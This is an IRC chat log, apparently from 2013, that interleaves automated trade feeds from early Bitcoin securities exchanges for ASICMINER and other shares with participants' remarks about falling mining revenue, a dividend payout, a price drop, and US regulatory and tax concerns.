Jun 19 18:29:46 [BTCTC] [ASICMINER-PT] 1 @ 2.807 BTC [-] Jun 19 18:29:49 [BTCTC] [ASICMINER-PT] 1 @ 2.800002 BTC [-] Jun 19 18:29:53 [BTCTC] [ASICMINER-PT] 1 @ 2.800001 BTC [-] Jun 19 18:29:56 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 19 18:29:58 [BTCTC] [ASICMINER-PT] 3 @ 2.8 = 8.4 BTC [-] Jun 19 18:30:00 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 19 18:30:13 [BTCTC] [ASICMINER-PT] 11 @ 2.8 = 30.8 BTC [-] Jun 19 18:30:25 [BTCTC] [ASICMINER-PT] 5 @ 2.835 = 14.175 BTC [+] Jun 19 18:30:28 [BTCTC] [ASICMINER-PT] 2 @ 2.843 = 5.686 BTC [+] Jun 19 18:30:33 [BTCTC] [ASICMINER-PT] 3 @ 2.845 = 8.535 BTC [+] Jun 19 18:30:38 [BTCTC] [ASICMINER-PT] 3 @ 2.849 = 8.547 BTC [+] Jun 19 18:30:40 [BTCTC] [ASICMINER-PT] 7 @ 2.85 = 19.95 BTC [+] Jun 19 18:31:57 [BTCTC] [DMS.MINING] 100 @ 0.0202 = 2.02 BTC [+] Jun 19 18:33:52 [HAVELOCK] [ASICM] 100 @ 0.0285 = 2.85 BTC [+] Jun 19 18:33:53 [HAVELOCK] [ASICM] 100 @ 0.0284 = 2.84 BTC [-] Jun 19 18:35:31 [BITFUNDER] [TAT.VIRTUALMINE] [PAID] 124,735 @ 0.00002600 Jun 19 18:36:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005998 BTC [-] Jun 19 18:37:25 [BTCTC] [DMS.MINING] 4 @ 0.020359 = 0.0814 BTC [+] Jun 19 18:39:17 [BTCTC] [ASICMINER-PT] 1 @ 2.8001 BTC [-] Jun 19 18:40:34 [BTCTC] [ASICMINER-PT] 1 @ 2.80001 BTC [-] Jun 19 18:40:36 [BTCTC] [ASICMINER-PT] 8 @ 2.8 = 22.4 BTC [-] Jun 19 18:43:31 [HAVELOCK] [ASICM] 8 @ 0.028799 = 0.2304 BTC [+] Jun 19 18:46:36 [HAVELOCK] [ASICM] 100 @ 0.0287 = 2.87 BTC [-] Jun 19 18:47:14 [HAVELOCK] [ASICM] 100 @ 0.0287 = 2.87 BTC [-] Jun 19 18:47:29 [HAVELOCK] [ASICM] 50 @ 0.0287 = 1.435 BTC [-] Jun 19 18:47:54 [MPEX] [S.MPOE] 2550 @ 0.00067863 = 1.7305 BTC [+] Jun 19 18:48:27 [BTCTC] [DMS.MINING] 3 @ 0.020359 = 0.0611 BTC [+] Jun 19 18:48:29 [HAVELOCK] [ASICM] 48 @ 0.028799 = 1.3824 BTC [+] Jun 19 18:48:30 [HAVELOCK] [ASICM] 2 @ 0.028799 = 0.0576 BTC [+] Jun 19 18:49:09 [HAVELOCK] [ASICM] 100 @ 0.0287 = 2.87 BTC [-] Jun 19 18:49:35 [HAVELOCK] [HIM] 2 @ 0.2881 = 0.5762 BTC [-] Jun 19 18:49:37 [HAVELOCK] [HIM] 3 @ 0.28800001 = 0.864 BTC [-] Jun 19 18:50:18 [BITFUNDER] [CoinBr.iDiff-E] [PAID] 271 @ 0.19339258 Jun 19 18:50:19 [HAVELOCK] [ASICM] 100 @ 0.0287 = 2.87 BTC [-] Jun 19 18:50:55 [HAVELOCK] [ASICM] 50 @ 0.0287 = 1.435 BTC [-] Jun 19 18:51:40 [HAVELOCK] [ASICM] 15 @ 0.0287 = 0.4305 BTC [-] Jun 19 18:52:02 [HAVELOCK] [ASICM] 3 @ 0.0287 = 0.0861 BTC [-] Jun 19 18:52:06 [HAVELOCK] [HIM] 15 @ 0.288 = 4.32 BTC [-] Jun 19 18:55:04 [BTCTC] [S.MPOE-PT] 3 @ 0.000699 = 0.0021 BTC [-] Jun 19 18:59:30 [BTCTC] [ASICMINER-PT] 1 @ 2.8001 BTC [+] Jun 19 18:59:32 [BTCTC] [ASICMINER-PT] 17 @ 2.8 = 47.6 BTC [-] Jun 19 18:59:36 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 19 19:08:42 [BTCTC] [ASICMINER-PT] 3 @ 2.79 = 8.37 BTC [-] Jun 19 19:09:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02821 BTC [-] Jun 19 19:09:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.02821 BTC [-] Jun 19 19:09:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.0282 = 0.1974 BTC [-] Jun 19 19:09:43 [BTCTC] [TAT.ASICMINER] 31 @ 0.028102 = 0.8712 BTC [-] Jun 19 19:11:17 [BTCTC] [ASICMINER-PT] 1 @ 2.79 BTC [-] Jun 19 19:12:41 [BTCTC] [ASICMINER-PT] 1 @ 2.79 BTC [-] Jun 19 19:12:43 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [-] Jun 19 19:14:55 [BTCTC] [ASICMINER-PT] 2 @ 2.78 = 5.56 BTC [-] Jun 19 19:15:02 [BTCTC] [ASICMINER-PT] 1 @ 2.770001 BTC [-] Jun 19 19:15:13 [BTCTC] [ASICMINER-PT] 1 @ 2.77 BTC [-] Jun 19 19:19:41 [BTCTC] [RSM] 4 @ 0.0199 = 0.0796 BTC [+] Jun 19 19:22:00 mining revenue last week: 0.0186052 /share Jun 19 19:22:00 mining revenue this week: 0.0148758 /share Jun 19 19:22:01 That's like a 20% drop... Jun 19 19:22:02 [BTCTC] [DMS.PURCHASE] 1 @ 0.054499 BTC [-] Jun 19 19:22:08 how about that difficulty! Jun 19 19:22:36 pretty interesting Jun 19 19:23:43 asicminer "had" an advantage Jun 19 19:23:50 i'm not sure they do anymore Jun 19 19:24:04 now it's aprobably a regular mining turd Jun 19 19:24:19 or headed in that direction as the diff skyrockets Jun 19 19:24:55 [BTCTC] [ASICMINER-PT] 1 @ 2.765 BTC [-] Jun 19 19:24:57 [BTCTC] [ASICMINER-PT] 1 @ 2.762 BTC [-] Jun 19 19:24:59 [BTCTC] [ASICMINER-PT] 1 @ 2.761002 BTC [-] Jun 19 19:25:04 [BTCTC] [ASICMINER-PT] 2 @ 2.76001 = 5.52 BTC [-] Jun 19 19:25:07 [BTCTC] [ASICMINER-PT] 1 @ 2.76 BTC [-] Jun 19 19:25:10 [HAVELOCK] [ASICM] 1 @ 0.0284 BTC [-] Jun 19 19:26:48 [HAVELOCK] [ASICM] 2 @ 0.0282 = 0.0564 BTC [-] Jun 19 19:27:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02845 BTC [+] Jun 19 19:27:41 [BTCTC] [ASICMINER-PT] 2 @ 2.75001 = 5.5 BTC [-] Jun 19 19:27:43 [HAVELOCK] [ASICM] 1 @ 0.02816 BTC [-] Jun 19 19:27:43 [BTCTC] [ASICMINER-PT] 2 @ 2.75001 = 5.5 BTC [-] Jun 19 19:27:45 [BTCTC] [ASICMINER-PT] 1 @ 2.75 BTC [-] Jun 19 19:27:46 [BTCTC] [ASICMINER-PT] 5 @ 2.75 = 13.75 BTC [-] Jun 19 19:27:53 [HAVELOCK] [ASICM] 91 @ 0.0281 = 2.5571 BTC [-] Jun 19 19:27:54 [HAVELOCK] [ASICM] 7 @ 0.0281 = 0.1967 BTC [-] Jun 19 19:28:04 [BTCTC] [TAT.ASICMINER] 9 @ 0.02845 = 0.2561 BTC [+] Jun 19 19:28:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.0281 BTC [-] Jun 19 19:28:36 [HAVELOCK] [ASICM] 7 @ 0.0281 = 0.1967 BTC [-] Jun 19 19:28:52 [BTCTC] [RSM] 40 @ 0.02 = 0.8 BTC [+] Jun 19 19:29:18 [HAVELOCK] [ASICM] 10 @ 0.02801 = 0.2801 BTC [-] Jun 19 19:29:19 [HAVELOCK] [ASICM] 10 @ 0.028 = 0.28 BTC [-] Jun 19 19:29:19 [HAVELOCK] [ASICM] 2 @ 0.028 = 0.056 BTC [-] Jun 19 19:29:21 [HAVELOCK] [ASICM] 1 @ 0.028 BTC [-] Jun 19 19:29:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.0281 BTC [-] Jun 19 19:30:39 [HAVELOCK] [ASICM] 1 @ 0.02787999 BTC [-] Jun 19 19:31:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.02845 = 0.0569 BTC [+] Jun 19 19:32:26 [HAVELOCK] [ASICM] 59 @ 0.0272 = 1.6048 BTC [-] Jun 19 19:32:34 [HAVELOCK] [ASICM] 146 @ 0.02717 = 3.9668 BTC [-] Jun 19 19:34:10 AM div'd Jun 19 19:35:16 [HAVELOCK] [ASICM] 4 @ 0.02717 = 0.1087 BTC [-] Jun 19 19:35:17 [HAVELOCK] [ASICM] 1 @ 0.0271 BTC [-] Jun 19 19:35:47 [BTCTC] [ASICMINER-PT] 1 @ 2.75001 BTC [+] Jun 19 19:35:49 [BTCTC] [ASICMINER-PT] 10 @ 2.75 = 27.5 BTC [-] Jun 19 19:35:50 [BTCTC] [ASICMINER-PT] 19 @ 2.731 = 51.889 BTC [-] Jun 19 19:36:25 [BTCTC] [ASICMINER-PT] 1 @ 2.730001 BTC [-] Jun 19 19:37:03 [BTCTC] [ASICMINER-PT] 1 @ 2.730001 BTC [-] Jun 19 19:37:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0281 BTC [-] Jun 19 19:37:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.028001 = 0.56 BTC [-] Jun 19 19:37:53 almost exactly half of last week Jun 19 19:37:58 yep Jun 19 19:38:10 price will probly fall to 2.55ish Jun 19 19:38:26 sell now, buy it backer lower later Jun 19 19:38:32 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [-] Jun 19 19:38:33 don't listen to me Jun 19 19:38:44 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [-] Jun 19 19:39:09 not the worst advice Jun 19 19:39:12 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Jun 19 19:39:15 [HAVELOCK] [ASICM] 100 @ 0.027 = 2.7 BTC [-] Jun 19 19:39:20 sell sell sell! Jun 19 19:39:24 hehe Jun 19 19:39:37 [BTCTC] [S.DICE-PT] 4 @ 0.00266 = 0.0106 BTC [-] Jun 19 19:39:42 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [+] Jun 19 19:39:58 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Jun 19 19:40:08 [BTCTC] [S.DICE-PT] 58 @ 0.002501 = 0.1451 BTC [-] Jun 19 19:40:13 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Jun 19 19:40:15 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Jun 19 19:40:17 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Jun 19 19:40:25 [HAVELOCK] [ASICM] 400 @ 0.027 = 10.8 BTC [-] Jun 19 19:40:27 [HAVELOCK] [ASICM] 1 @ 0.027 BTC [-] Jun 19 19:40:44 whoops Jun 19 19:40:58 I wonder if we are going to come back to 2.5 btc.. Jun 19 19:41:01 [BTCTC] [TAT.ASICMINER] 39 @ 0.027901 = 1.0881 BTC [-] Jun 19 19:41:02 [BTCTC] [ASICMINER-PT] 2 @ 2.73 = 5.46 BTC [+] Jun 19 19:41:18 Wouldn't it be funny if ASICMINER share prices followed btcusd/100? It'll go down all the way to 0.7 BTC per share :P Jun 19 19:41:30 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [+] Jun 19 19:41:35 [BTCTC] [TAT.ASICMINER] 24 @ 0.027901 = 0.6696 BTC [-] Jun 19 19:41:44 [BTCTC] [TAT.ASICMINER] 22 @ 0.0279 = 0.6138 BTC [-] Jun 19 19:41:46 [BTCTC] [TAT.ASICMINER] 46 @ 0.0279 = 1.2834 BTC [-] Jun 19 19:41:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0276 BTC [-] Jun 19 19:41:53 [HAVELOCK] [ASICM] 33 @ 0.0266 = 0.8778 BTC [-] Jun 19 19:42:12 [BTCTC] [S.DICE-PT] 40 @ 0.0025 = 0.1 BTC [-] Jun 19 19:42:17 [BTCTC] [S.DICE-PT] 25 @ 0.0024 = 0.06 BTC [-] Jun 19 19:42:19 [BTCTC] [S.DICE-PT] 73 @ 0.0024 = 0.1752 BTC [-] Jun 19 19:42:57 [BTCTC] [ASICMINER-PT] 1 @ 2.72 BTC [-] Jun 19 19:42:59 [BTCTC] [ASICMINER-PT] 1 @ 2.7141 BTC [-] Jun 19 19:43:01 [BTCTC] [ASICMINER-PT] 5 @ 2.714 = 13.57 BTC [-] Jun 19 19:43:04 [BTCTC] [TAT.ASICMINER] 38 @ 0.0276 = 1.0488 BTC [-] Jun 19 19:43:05 [BTCTC] [ASICMINER-PT] 1 @ 2.711 BTC [-] Jun 19 19:43:13 [HAVELOCK] [ASICM] 91 @ 0.0265 = 2.4115 BTC [-] Jun 19 19:43:27 massive dumping Jun 19 19:43:52 [BTCTC] [ASICMINER-PT] 1 @ 2.7142 BTC [+] Jun 19 19:43:57 [BTCTC] [ASICMINER-PT] 1 @ 2.71111 BTC [-] Jun 19 19:44:05 [BTCTC] [ASICMINER-PT] 2 @ 2.710001 = 5.42 BTC [-] Jun 19 19:44:26 [BTCTC] [ASICMINER-PT] 2 @ 2.710001 = 5.42 BTC [-] Jun 19 19:44:55 [BTCTC] [ASICMINER-PT] 1 @ 2.71111 BTC [+] Jun 19 19:45:03 [BTCTC] [ASICMINER-PT] 1 @ 2.711 BTC [-] Jun 19 19:45:22 [BTCTC] [ASICMINER-PT] 1 @ 2.710001 BTC [-] Jun 19 19:45:43 [BTCTC] [ASICMINER-PT] 1 @ 2.71111 BTC [+] Jun 19 19:46:35 [BTCTC] [ASICMINER-PT] 1 @ 2.71111 BTC [+] Jun 19 19:47:14 [BTCTC] [ASICMINER-PT] 1 @ 2.714001 BTC [+] Jun 19 19:47:54 [BTCTC] [ASICMINER-PT] 3 @ 2.72 = 8.16 BTC [+] Jun 19 19:48:19 [BTCTC] [ASICMINER-PT] 1 @ 2.71111 BTC [-] Jun 19 19:48:55 [BTCTC] [ASICMINER-PT] 1 @ 2.710002 BTC [-] Jun 19 19:49:00 [BTCTC] [ASICMINER-PT] 2 @ 2.710001 = 5.42 BTC [-] Jun 19 19:49:05 [BTCTC] [ASICMINER-PT] 30 @ 2.71 = 81.3 BTC [-] Jun 19 19:49:08 [BTCTC] [ASICMINER-PT] 1 @ 2.71 BTC [-] Jun 19 19:49:11 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Jun 19 19:49:13 [BTCTC] [ASICMINER-PT] 10 @ 2.7 = 27 BTC [-] Jun 19 19:49:17 [HAVELOCK] [ASICM] 341 @ 0.027 = 9.207 BTC [+] Jun 19 19:49:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.0272 = 0.1088 BTC [-] Jun 19 19:49:56 [BTCTC] [TAT.ASICMINER] 4 @ 0.02702 = 0.1081 BTC [-] Jun 19 19:50:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.02701 = 0.081 BTC [-] Jun 19 19:50:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Jun 19 19:50:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Jun 19 19:50:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Jun 19 19:50:12 [BTCTC] [TAT.ASICMINER] 8 @ 0.026811 = 0.2145 BTC [-] Jun 19 19:50:14 [BTCTC] [TAT.ASICMINER] 14 @ 0.026807 = 0.3753 BTC [-] Jun 19 19:50:18 [BTCTC] [TAT.ASICMINER] 14 @ 0.0268 = 0.3752 BTC [-] Jun 19 19:51:11 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Jun 19 19:52:33 [HAVELOCK] [ASICM] 10 @ 0.02651 = 0.2651 BTC [-] Jun 19 19:52:43 [HAVELOCK] [ASICM] 409 @ 0.0265 = 10.8385 BTC [-] Jun 19 19:53:04 [HAVELOCK] [ASICM] 2 @ 0.02561 = 0.0512 BTC [-] Jun 19 19:53:15 [HAVELOCK] [ASICM] 5 @ 0.02559 = 0.128 BTC [-] Jun 19 19:54:04 [BTCTC] [ASICMINER-PT] 2 @ 2.679 = 5.358 BTC [-] Jun 19 19:54:06 [HAVELOCK] [ASICM] 2 @ 0.026 = 0.052 BTC [+] Jun 19 19:54:34 [BTCTC] [ASICMINER-PT] 1 @ 2.6751 BTC [-] Jun 19 19:54:36 [BTCTC] [ASICMINER-PT] 1 @ 2.6751 BTC [-] Jun 19 19:55:01 [BTCTC] [ASICMINER-PT] 1 @ 2.655 BTC [-] Jun 19 19:55:05 [BTCTC] [ASICMINER-PT] 1 @ 2.655 BTC [-] Jun 19 19:55:15 [BTCTC] [ASICMINER-PT] 1 @ 2.6501 BTC [-] Jun 19 19:55:17 [BTCTC] [ASICMINER-PT] 10 @ 2.65 = 26.5 BTC [-] Jun 19 19:55:27 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [-] Jun 19 19:56:21 [BTCTC] [ASICMINER-PT] 2 @ 2.6275 = 5.255 BTC [-] Jun 19 19:56:59 [BTCTC] [TAT.ASICMINER] 30 @ 0.0269 = 0.807 BTC [+] Jun 19 19:57:01 [BTCTC] [TAT.ASICMINER] 25 @ 0.0269 = 0.6725 BTC [+] Jun 19 19:57:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.02681 = 0.1072 BTC [-] Jun 19 19:57:06 [BTCTC] [TAT.ASICMINER] 11 @ 0.0268 = 0.2948 BTC [-] Jun 19 19:57:13 [BTCTC] [TAT.ASICMINER] 26 @ 0.0268 = 0.6968 BTC [-] Jun 19 19:57:15 [BTCTC] [TAT.ASICMINER] 40 @ 0.0266 = 1.064 BTC [-] Jun 19 19:57:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0266 = 0.0532 BTC [-] Jun 19 19:57:43 [BTCTC] [ASICMINER-PT] 2 @ 2.6275 = 5.255 BTC [-] Jun 19 19:57:44 [BTCTC] [ASICMINER-PT] 1 @ 2.62 BTC [-] Jun 19 19:57:45 [BTCTC] [ASICMINER-PT] 1 @ 2.613 BTC [-] Jun 19 19:57:47 [BTCTC] [ASICMINER-PT] 2 @ 2.61 = 5.22 BTC [-] Jun 19 19:57:49 [BTCTC] [ASICMINER-PT] 14 @ 2.61 = 36.54 BTC [-] Jun 19 19:57:52 [BTCTC] [ASICMINER-PT] 1 @ 2.609 BTC [-] Jun 19 19:57:54 [BTCTC] [ASICMINER-PT] 7 @ 2.609 = 18.263 BTC [-] Jun 19 19:58:13 [BTCTC] [ASICMINER-PT] 3 @ 2.609 = 7.827 BTC [-] Jun 19 19:58:16 [BTCTC] [ASICMINER-PT] 12 @ 2.601 = 31.212 BTC [-] Jun 19 19:58:18 [HAVELOCK] [ASICM] 80 @ 0.0259999 = 2.08 BTC [-] Jun 19 19:58:44 [BTCTC] [ASICMINER-PT] 1 @ 2.6012 BTC [+] Jun 19 19:59:15 [BTCTC] [ASICMINER-PT] 18 @ 2.601 = 46.818 BTC [-] Jun 19 19:59:39 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [-] Jun 19 19:59:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.02632 = 0.1316 BTC [-] Jun 19 20:00:45 how low will it go? Jun 19 20:00:50 this is fun Jun 19 20:00:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.02632 = 0.1316 BTC [-] Jun 19 20:01:00 why are they selling before the div was paid out? Jun 19 20:01:02 will it blend? Jun 19 20:01:42 maybe they assume it will really drop after divs Jun 19 20:01:54 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] Jun 19 20:02:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02629 BTC [-] Jun 19 20:02:34 BTCT.co is buckling Jun 19 20:02:39 gox-factor! Jun 19 20:02:49 [BTCTC] [ASICMINER-PT] 2 @ 2.57 = 5.14 BTC [-] Jun 19 20:03:09 [HAVELOCK] [ASICM] 4 @ 0.026 = 0.104 BTC [+] Jun 19 20:03:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.026281 = 0.1051 BTC [-] Jun 19 20:03:31 [HAVELOCK] [ASICM] 273 @ 0.02601 = 7.1007 BTC [+] Jun 19 20:04:04 [HAVELOCK] [ASICM] 146 @ 0.0263 = 3.8398 BTC [+] Jun 19 20:04:14 [HAVELOCK] [ASICM] 41 @ 0.0263 = 1.0783 BTC [+] Jun 19 20:04:41 [BTCTC] [TAT.ASICMINER] 47 @ 0.02628 = 1.2352 BTC [-] Jun 19 20:05:30 https://bitcointalk.org/index.php?topic=238230.0;topicseen Jun 19 20:05:32 [BTCTC] [ASICMINER-PT] 2 @ 2.566 = 5.132 BTC [-] Jun 19 20:05:40 opportunity for -PR to shine Jun 19 20:05:54 in the newbie jail no less Jun 19 20:06:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.02628 BTC [-] Jun 19 20:06:27 So austere! Jun 19 20:06:51 [MPEX] [S.MPOE] 3451 @ 0.00067747 = 2.3379 BTC [-] Jun 19 20:06:52 [MPEX] [S.MPOE] 1649 @ 0.00067745 = 1.1171 BTC [-] Jun 19 20:07:12 [BTCTC] [ASICMINER-PT] 1 @ 2.5601 BTC [-] Jun 19 20:08:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02628 BTC [-] Jun 19 20:08:39 [BTCTC] [ASICMINER-PT] 3 @ 2.5601 = 7.6803 BTC [-] Jun 19 20:08:42 Does -PR go into the newbie section? Jun 19 20:11:05 [BTCTC] [TAT.ASICMINER] 49 @ 0.02628 = 1.2877 BTC [-] Jun 19 20:11:07 [BTCTC] [ASICMINER-PT] 4 @ 2.56 = 10.24 BTC [-] Jun 19 20:13:40 [HAVELOCK] [ASICM] 15 @ 0.0270999 = 0.4065 BTC [+] Jun 19 20:14:02 [BTCTC] [TAT.ASICMINER] 27 @ 0.026275 = 0.7094 BTC [-] Jun 19 20:14:07 [HAVELOCK] [ASICM] 15 @ 0.0257 = 0.3855 BTC [-] Jun 19 20:14:13 [BTCTC] [ASICMINER-PT] 2 @ 2.5601 = 5.1202 BTC [+] Jun 19 20:14:17 [HAVELOCK] [ASICM] 450 @ 0.02512 = 11.304 BTC [-] Jun 19 20:14:23 [HAVELOCK] [ASICM] 200 @ 0.02505 = 5.01 BTC [-] Jun 19 20:14:32 [HAVELOCK] [ASICM] 10 @ 0.02501 = 0.2501 BTC [-] Jun 19 20:14:39 [HAVELOCK] [ASICM] 4 @ 0.02500007 = 0.1 BTC [-] Jun 19 20:14:45 [HAVELOCK] [ASICM] 159 @ 0.02500003 = 3.975 BTC [-] Jun 19 20:15:03 [HAVELOCK] [HIM] 85 @ 0.288 = 24.48 BTC [-] Jun 19 20:15:59 [HAVELOCK] [ASICM] 25 @ 0.0251 = 0.6275 BTC [+] Jun 19 20:16:02 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] Jun 19 20:16:05 [HAVELOCK] [ASICM] 120 @ 0.025 = 3 BTC [-] Jun 19 20:17:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.0262 = 0.0786 BTC [-] Jun 19 20:20:22 [BTCTC] [ASICMINER-PT] 1 @ 2.629999 BTC [+] Jun 19 20:21:52 [BTCTC] [TAT.ASICMINER] 12 @ 0.026071 = 0.3129 BTC [-] Jun 19 20:23:13 [HAVELOCK] [ASICM] 100 @ 0.0267 = 2.67 BTC [+] Jun 19 20:23:31 [HAVELOCK] [ASICM] 710 @ 0.0267989 = 19.0272 BTC [+] Jun 19 20:25:10 [HAVELOCK] [ASICM] 1 @ 0.0272 BTC [+] Jun 19 20:25:48 [HAVELOCK] [ASICM] 150 @ 0.0272 = 4.08 BTC [+] Jun 19 20:27:03 [HAVELOCK] [ASICM] 4 @ 0.0275 = 0.11 BTC [+] Jun 19 20:29:11 [HAVELOCK] [HIM] 11 @ 0.28011001 = 3.0812 BTC [-] Jun 19 20:29:24 [BTCTC] [ASICMINER-PT] 4 @ 2.57 = 10.28 BTC [-] Jun 19 20:30:04 [HAVELOCK] [ASICM] 100 @ 0.02611 = 2.611 BTC [-] Jun 19 20:30:08 [HAVELOCK] [ASICM] 10 @ 0.027499 = 0.275 BTC [+] Jun 19 20:30:12 [HAVELOCK] [ASICM] 250 @ 0.0261 = 6.525 BTC [-] Jun 19 20:30:19 [HAVELOCK] [ASICM] 144 @ 0.0260706 = 3.7542 BTC [-] Jun 19 20:31:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.02601 = 0.104 BTC [-] Jun 19 20:31:28 [HAVELOCK] [ASICM] [PAID] 42.19795224 BTC to 245`394 shares, 17196 satoshi per share Jun 19 20:33:13 [HAVELOCK] [ASICM] 25 @ 0.027198 = 0.68 BTC [+] Jun 19 20:33:31 [BITFUNDER] [TAT.ASICMINER] [PAID] 22,007 @ 0.00017196 Jun 19 20:33:41 [HAVELOCK] [ASICM] 11 @ 0.027198 = 0.2992 BTC [+] Jun 19 20:34:04 [HAVELOCK] [ASICM] 16 @ 0.0271 = 0.4336 BTC [-] Jun 19 20:34:19 [HAVELOCK] [VTX] 1 @ 0.4801 BTC [-] Jun 19 20:34:21 [HAVELOCK] [ASICM] [PAID] 245,394 @ 0.00017196 Jun 19 20:34:29 [HAVELOCK] [VTX] 5 @ 0.480057 = 2.4003 BTC [-] Jun 19 20:34:56 [HAVELOCK] [VTX] 1 @ 0.480047 BTC [-] Jun 19 20:35:00 [BTCTC] [TAT.ASICMINER] 23 @ 0.02601 = 0.5982 BTC [-] Jun 19 20:36:21 [BTCTC] [ASICMINER-PT] 1 @ 2.689 BTC [+] Jun 19 20:36:30 [HAVELOCK] [ASICM] 10 @ 0.02709 = 0.2709 BTC [-] Jun 19 20:36:31 [HAVELOCK] [ASICM] 65 @ 0.027098 = 1.7614 BTC [+] Jun 19 20:38:01 [HAVELOCK] [ASICM] 3 @ 0.027 = 0.081 BTC [-] Jun 19 20:39:40 [BTCTC] [ASICMINER-PT] 2 @ 2.614 = 5.228 BTC [-] Jun 19 20:39:54 [HAVELOCK] [ASICM] 2 @ 0.027097 = 0.0542 BTC [+] Jun 19 20:40:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.026 = 0.26 BTC [-] Jun 19 20:40:46 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005998 = 0.012 BTC [-] Jun 19 20:40:59 [HAVELOCK] [ASICM] 2 @ 0.027097 = 0.0542 BTC [+] Jun 19 20:41:11 [HAVELOCK] [ASICM] 1 @ 0.0269 BTC [-] Jun 19 20:41:12 [HAVELOCK] [ASICM] 1 @ 0.0269 BTC [-] Jun 19 20:41:40 [HAVELOCK] [ASICM] 1 @ 0.027097 BTC [+] Jun 19 20:42:36 [BTCTC] [TAT.ASICMINER] 8 @ 0.0276 = 0.2208 BTC [+] Jun 19 20:43:16 [HAVELOCK] [ASICM] 1 @ 0.02709 BTC [-] Jun 19 20:45:39 [BTCTC] [TAT.ASICMINER] 25 @ 0.0262 = 0.655 BTC [-] Jun 19 20:45:46 Ukto, burnside, other US denizens: http://contrariancompliance.com/2013/06/18/most-bitcoiners-are-unaware-or-in-a-state-of-deep-denial/ Jun 19 20:45:50 what do you think? Jun 19 20:46:01 i think it's an advertorial Jun 19 20:46:09 [BTCTC] [ASICMINER-PT] 5 @ 2.615 = 13.075 BTC [+] Jun 19 20:46:35 for what? joining nmta? Jun 19 20:46:37 [HAVELOCK] [ASICM] 1 @ 0.02709 BTC [-] Jun 19 20:46:41 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.005998 = 0.024 BTC [-] Jun 19 20:47:16 "my advice for them would be –as the first step– to recognize and acknowledge the regulatory challenges they face. Also, don’t forget to join the NMTA, and enroll for some of our compliance training courses!" Jun 19 20:47:25 i admittedly skimmed the article, Jun 19 20:47:33 [BTCTC] [ASICMINER-PT] 6 @ 2.615 = 15.69 BTC [+] Jun 19 20:47:38 but i assume he offers no hard help Jun 19 20:47:45 insight, nor news Jun 19 20:47:53 [BTCTC] [ASICMINER-PT] 1 @ 2.6999 BTC [+] Jun 19 20:49:26 he says register with FINCEN now Jun 19 20:49:32 [BTCTC] [TAT.ASICMINER] 46 @ 0.0262 = 1.2052 BTC [-] Jun 19 20:49:52 i see his advice now Jun 19 20:49:59 yes it struck me as "it will be okay, just bow deeper". but i'd like to know opinion of someone like ukto Jun 19 20:50:09 who actually touches $$ Jun 19 20:50:22 i know ukto is actively working on these issues Jun 19 20:50:36 he's still in the UK though Jun 19 20:50:54 oh, he's operating from uk? and burnside? Jun 19 20:51:03 [MPEX] [S.MPOE] 9300 @ 0.00067745 = 6.3003 BTC [-] Jun 19 20:51:15 [HAVELOCK] [ASICM] 1 @ 0.02709 BTC [-] Jun 19 20:51:35 no i mena ukto is literally in the UK right now Jun 19 20:52:09 i'm not sure how much info he is sharing publically so you'll need to pm him for more details Jun 19 20:52:17 in any case, i can agree with the premise that trying to operate btc business from US needs indeed a state of denial Jun 19 20:52:48 it seems it's only not regulated *yet* Jun 19 20:53:06 but IRS already said it's gonna be taxed Jun 19 20:53:07 so unclear whether it's illegal yet as well Jun 19 20:53:35 that's regarding conversion into USD though right? Jun 19 20:53:42 how would they tax BTC? Jun 19 20:53:56 they cna't really Jun 19 20:54:00 no. they salivate on prospect to tax pure btc transactions Jun 19 20:54:10 i cant see how Jun 19 20:54:12 "exchanging tokens of value" Jun 19 20:54:16 what value? Jun 19 20:54:24 US gov gona use goxprice too? Jun 19 20:54:36 i'd die Jun 19 20:54:38 hehe Jun 19 20:54:48 [HAVELOCK] [ASICM] 1 @ 0.02709 BTC [-] Jun 19 20:54:50 